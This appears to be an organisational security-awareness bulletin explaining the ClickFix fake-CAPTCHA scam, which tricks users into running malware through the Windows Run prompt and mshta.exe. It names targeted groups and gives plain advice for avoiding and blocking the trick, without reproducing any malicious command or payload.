Main Menu
SPARCS - Topic Of The Week

Permission to break everything

How a new malware can Infect your PC in Three Easy Steps

Cybercriminals have taken a classic security feature, CAPTCHAs, and turned it into a clever trap. The ClickFix attack tricks users into proving that they are “not a robot” by following keyboard commands that secretly download malware onto their devices. This particular scam usually starts with a website popup that looks something like this:

Human Verification screen with "i am not a robot" button

Instead of checking for bots, this fake CAPTCHA guides users through three simple but dangerous steps:

Human Verification screen with instructions

 

  1. Pressing the keyboard key with the Windows icon and the letter “R” opens a Windows “Run” prompt that will execute any specified program that is already installed on the system.
  2. Pressing the “CTRL” key and the letter “V” at the same time pastes malicious code from the site’s virtual clipboard.
  3. Pressing the “Enter” key causes Windows to download and launch malicious code through “mshta.exe,” a Windows program designed to run Microsoft HTML application files.

This might sound familiar because ClickFix is the modern cousin of the old Microsoft Office macro scams. Those were so widely abused that Microsoft had to block them by default, but now, attackers have found new ways to make users help install malware.

Who’s Being Targeted?

  • Hospitality workers are being lured in by fake Booking.com emails referencing bad reviews or guest requests.
  • Healthcare professionals have been redirected to ClickFix attacks from compromised physical therapy websites.
  • Random web visitors are encountering spoofed Google Chrome error pages and fake Facebook pop-ups.

How to Avoid the ClickFix Trap

🚫 Don’t follow sketchy CAPTCHA instructions. Real ones don’t ask you to press Windows + R!

🚫 Be cautious with urgent emails. If an email pressures you to fix an issue or respond to a complaint, verify it first.

🚫 Use security settings. Organizations can block Windows’ "Run" command via Microsoft Group Policy to stop this attack.

ClickFix proves that cybercriminals will go to great lengths to make malware look like just another routine click. But with awareness and caution, you won’t fall for the "fix" that actually breaks everything.

On
Back to Top